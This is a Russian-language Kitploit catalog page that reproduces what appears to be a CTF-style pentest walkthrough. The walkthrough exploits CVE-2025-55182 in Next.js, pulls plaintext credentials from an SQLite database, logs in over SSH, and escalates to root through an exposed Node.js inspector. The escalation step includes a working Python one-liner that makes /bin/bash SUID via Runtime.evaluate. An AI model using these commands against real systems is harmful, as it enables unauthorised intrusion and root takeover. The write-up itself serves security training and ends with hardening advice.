Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-55182 — Технический отчёт о пентесте, демонстрирующий эксплуатацию CVE-2025-55182 в Next.js, сбор учётных данных из SQLite и повышение привилегий через инспектор Node.js для получения root-доступа. | Kitploit
Инструменты/GitHubGitHub/chrisbarack/cve-2025-55182
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubchrisbarack/cve-2025-55182

cve-2025-55182

Технический отчёт о пентесте, демонстрирующий эксплуатацию CVE-2025-55182 в Next.js, сбор учётных данных из SQLite и повышение привилегий через инспектор Node.js для получения root-доступа.

Репозиторий
9 ч 10 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Отчёт по пентесту: RCE в Next.js и повышение привилегий через Node.js Inspector

В данном техническом отчёте подробно описан путь эксплуатации для компрометации цели, на которой размещено уязвимое веб-приложение Next.js: получение первоначального доступа с помощью похищенных учётных данных и использование неправильно сконфигурированного локального инспектора V8 в Node.js для повышения привилегий до root.

Фаза 1: Внешняя разведка и эксплуатация веб-приложения

Первоначальный сбор информации

Цель размещает веб-приложение Next.js, работающее на стандартных портах HTTP/HTTPS (80/443). Стандартный перебор каталогов и ручной анализ показывают, что приложение работает на версии, уязвимой к CVE-2025-55182.

Эксплуатация через Burp Suite

Чтобы использовать уязвимость, перехватите трафик приложения с помощью Burp Suite (или Burp Repeater) и внедрите специально созданную эксплойт-нагрузку, нацеленную на CVE-2025-55182.

Обнаружение базы данных

После получения возможности выполнения кода и чтения локальных файлов через эксплойт проверьте каталог исходного кода приложения. Локальный файл базы данных SQLite (database.db) расположен рядом с основным исходным кодом приложения.

Фаза 2: Извлечение учётных данных и получение первоначального доступа

Проверка базы данных

Выполните запрос или выгрузите содержимое файла базы данных, чтобы извлечь сохранённые записи пользователей.

root@kitploit:~
sqlite3 database.db "SELECT * FROM users;"

Извлечение учётных данных

Найдите пароль в открытом виде, связанный с локальным SSH-пользователем engineer.

Вход по SSH

Используйте восстановленные учётные данные для установления SSH-сессии с целевой машиной:

root@kitploit:~
ssh engineer@<TARGET-IP>

Получение флага пользователя

После аутентификации прочитайте флаг пользователя, расположенный в домашнем каталоге:

root@kitploit:~
cat /home/engineer/user.txt

Фаза 3: Повышение привилегий через Node.js Inspector

Разведка внутренних портов

Проверьте службы, привязанные исключительно к интерфейсу локальной петли (127.0.0.1), чтобы выявить внутренние векторы атаки:

root@kitploit:~
netstat -tulnp

Результат: внутренняя служба Node.js активно прослушивает локальный порт 9229.

Обнаружение UUID отладчика

Порты отладки V8 в Node.js требуют уникальный UUID сессии для взаимодействия через WebSocket. Выполните запрос к локальной конечной точке обнаружения с помощью curl с добавлением /json:

root@kitploit:~
curl -s http://127.0.0.1:9229/json

Вывод:

root@kitploit:~
{
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/46a680a0-1cf5-4af4-9ce6-474f77329639"
}

Выполнение нагрузки для повышения привилегий

Поскольку целевой процесс Node.js работает с привилегиями root, вы можете отправить сообщение Runtime.evaluate по протоколу Chrome DevTools Protocol (CDP) через Python поверх WebSockets, чтобы установить SUID-бит на /bin/bash:

root@kitploit:~
python3 -c 'import websocket, json; ws = websocket.create_connection("ws://127.0.0.1:9229/<YOUR-UUID>"); ws.send(json.dumps({"id": 1, "method": "Runtime.evaluate", "params": {"expression": "process.mainModule.require(\"child_process\").execSync(\"chmod +s /bin/bash\")"}})); print(ws.recv()); ws.close()'

Переход в root-оболочку

Убедитесь, что /bin/bash теперь имеет включённые SUID-разрешения (-rwsr-sr-x), затем запустите Bash с сохранением привилегий:

root@kitploit:~
ls -l /bin/bash
bash -p

Получение root-флага

Перейдите в домашний каталог пользователя root, чтобы захватить финальный флаг:

root@kitploit:~
cd /root
cat root.txt

Защита сред от этих векторов требует установки исправлений для веб-приложений, уязвимых к известным CVE, надлежащего ограничения разрешений на файлы баз данных, а также обеспечения того, чтобы порты отладки (например, инспектор Node.js на порту 9229) никогда не были открыты или доступны без аутентификации в производственных средах.

Скачать инструмент